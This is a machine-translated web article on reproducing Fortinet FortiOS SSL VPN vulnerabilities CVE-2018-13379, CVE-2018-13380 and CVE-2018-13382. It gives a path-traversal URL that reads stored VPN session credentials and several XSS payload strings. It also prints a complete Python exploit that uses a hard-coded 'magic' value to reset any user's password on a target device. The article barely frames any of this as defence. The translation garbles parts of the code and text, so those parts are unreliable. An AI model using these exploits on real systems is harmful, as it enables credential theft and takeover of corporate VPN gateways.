Shulou(Shulou.com)05/31 Report--

This article introduces you how Fortigate SSL VPN loopholes reappear, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Fortigate

The special term of Feita firewall equipment, Fortinet is the brand of Feita, and FortiGate refers to Feita hardware. Fortinet's award-winning FortiGate series is an ASIC-accelerated UTM solution that effectively protects against attacks at the network and content layers. FortiGate solutions can detect and eliminate multiple layers of attacks, such as viruses, worms, intrusions, and real-time applications such as Web malicious content, without causing network performance degradation. It involves a comprehensive security architecture that covers anti-virus / anti-spam, firewall, VPN, intrusion detection and prevention, anti-spam and traffic optimization. In addition to FortiGate, Fortinet also provides email security solutions such as FortiMail, and FortiClient for terminal and smartphone security.

CVE-2018-13379: brief introduction to Pre-auth arbitrary File Reading vulnerability

Fortinet FortiOS path traversal vulnerabilities (CNNVD-201905-1026, CVE-2018-13379)

The vulnerability stems from the system's failure to properly filter special elements in the resource or file path, which can be exploited by an attacker to access locations outside the restricted directory. SSL VPN in Fortinet FortiOS versions 5.6.3 to 5.6.7 and 6.0.0 to 6.0.4 is affected by this vulnerability.

Vulnerability impact

SSL VPN in Fortinet FortiOS versions 5.6.3 to 5.6.7 and Fortinet FortiOS 6.0.0 to 6.0.4 is affected by this vulnerability.

Recurrence process

You can visit the link to see if there are any vulnerabilities

/ remote/fgt_lang?lang=/../dev/cmdb/sslvpn_websession

You can view the user name and password

You can log in successfully.

Brief introduction of vulnerabilities in https://github.com/ianxtianxt/CVE-2018-13379CVE-2018-13380 Fortinet FortiOS xss testing tool

Fortinet FortiOS is a set of secure operating system specially designed for FortiGate network security platform of American Fortinet company. The system provides users with a variety of security functions, such as firewall, anti-virus, IPSec/SSLVPN, Web content filtering and anti-spam. There is a cross-site scripting vulnerability in Fortinet FortiOS portals in versions 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and earlier. The vulnerability is due to the lack of proper validation of client data by WEB applications. An attacker can exploit this vulnerability to execute client code.

Vulnerability impact

Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8

Recurrence process / remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert (1)% 3C/script%3E/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29/message?title=x&msg=%26%23

Brief introduction of CVE-2018-13382 Fortinet FortiOS magic backdoor vulnerability

Fortinet FortiOS is a set of secure operating system specially designed for FortiGate network security platform of American Fortinet company. The system provides users with a variety of security functions, such as firewall, anti-virus, IPSec/SSLVPN, Web content filtering and anti-spam. The SSL VPN Web portals in Fortinet FortiOS versions 6.0.0 to 6.0.4, 5.6.0 to 5.6.8, and 5.4.1 to 5.4.10 are vulnerable to licensing issues. The vulnerability is due to lack of authentication measures or insufficient authentication strength in the network system or product.

Vulnerability impact

Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11

Recurrence process

There is a special parameter magic in the login page, and once this parameter is a special string, you can change any user's password.

You can modify it directly using POC.

Import requests, binascii, optparse, sysfrom urlparse import urlparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings (InsecureRequestWarning) requests.packages.urllib3.disable_warnings () import multiprocessingimport coloredfrom user_agent import generate_user_agent, generate_navigatorbold=TrueuserAgent=generate_user_agent () username= "newpassword="ip="def setColor (message, bold=False, color=None, onColor=None): from termcolor import colored, cprint retVal = colored (message, color=color, on_color=onColor, attrs= (" bold ") ) return retValdef checkIP (ip): try: url = "https://"+ip+"/remote/login?lang=en" headers = {" User-Agent ": userAgent," Accept ":" text/html,application/xhtml+xml,application/xml " "Accept-Language": "en-US,en" Qroom0.5 "," Accept-Encoding ":" gzip, deflate "," Connection ":" close "," Upgrade-Insecure-Requests ":" 1 "} r=requests.get (url, headers=headers, verify=False) if r.status_code==200 and" Please Login "in r.text: return True else: return False except requests.exceptions.ConnectionError ase: print e return Falsedef changePassword (ip,username Newpassword): url = "https://"+ip+"/remote/logincheck" headers = {" User-Agent ": userAgent," Accept ":" * / * "," Accept-Language ":" en-US,en " Qroom0.5 "," Accept-Encoding ":" gzip, deflate "," Referer ":" https://"+ip+"/remote/login?lang=en", "Pragma": "no-cache", "Cache-Control": "no-store, no-cache, must-revalidate", "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain" Charset=UTF-8 "," Connection ":" close "} data= {" ajax ":" 1 "," username ": username," realm ":'," credential ": newpassword," magic ":" 4tinet2095866 "," reqid ":" 0 "," credential2 ": newpassword} r=requests.post (url, headers=headers, data=data Verify=False) if r.status_code==200 and 'redir=/remote/hostcheck_install' in r.text: return True else: return Falsedef testLogin (ip,username,newpassword): url = "https://"+ip+"/remote/logincheck" headers = {" User-Agent ": userAgent," Accept ":" * / * "," Accept-Language ":" en-US,en " Qroom0.5 "," Accept-Encoding ":" gzip, deflate "," Referer ":" https://"+ip+"/remote/login?lang=en", "Pragma": "no-cache", "Cache-Control": "no-store, no-cache, must-revalidate", "If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain" Charset=UTF-8 "," Connection ":" close "} data= {" ajax ":" 1 "," username ": username," realm ":''," credential ": newpassword} r=requests.post (url, headers=headers, data=data, verify=False) if r.status_code==200 and" redir=/remote/hostcheck_install "in r.text: return True else: return Falseparser = optparse.OptionParser () parser.add_option ('- iota, action=" store " Dest= "ip", help= "e.g. 127.0.0.1 help= 10443") parser.add_option ('- upright, action= "store", dest= "username") parser.add_option ('- action= "store", dest= "password") options, remainder = parser.parse_args () if not options.username or not options.password or not options.ip: print "[!] Please provide the ip (- I), username (- u) and password (- p) "sys.exit () if options.username: username=options.usernameif options.password: newpassword=options.passwordif options.ip: ip=options.iptmpStatus=checkIP (ip) if tmpStatus==True: print" [*] Checking if target is a Fortigate device "+ setColor (" [OK] ", bold, color=" green ") if changePassword (ip,username Newpassword) = True: print "[*] Using the magic keyword to change password for: [" + username+ "]" + setColor ("[OK]", bold, color= "green") if testLogin (ip,username,newpassword) = = True: print "[*] Testing new credentials [" + username+ "|" + newpassword+ "]" + setColor ("[OK]", bold) Color= "green") print "* Enjoy your new credentials *" else: print "[*] Testing new credentials [" + username+ "|" + newpassword+ "]" + setColor ("[NOK]", bold, color= "red") else: print "[*] Using the magic keyword to change password for: [" + username+ "]" + setColor ("[NOK]" Bold, color= "red") else: print "[*] Checking if target is a Fortigate device" + setColor ("[NOK]", bold, color= "red") about how Fortigate SSL VPN vulnerability recurrence is shared here. I hope the above content can be of some help to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.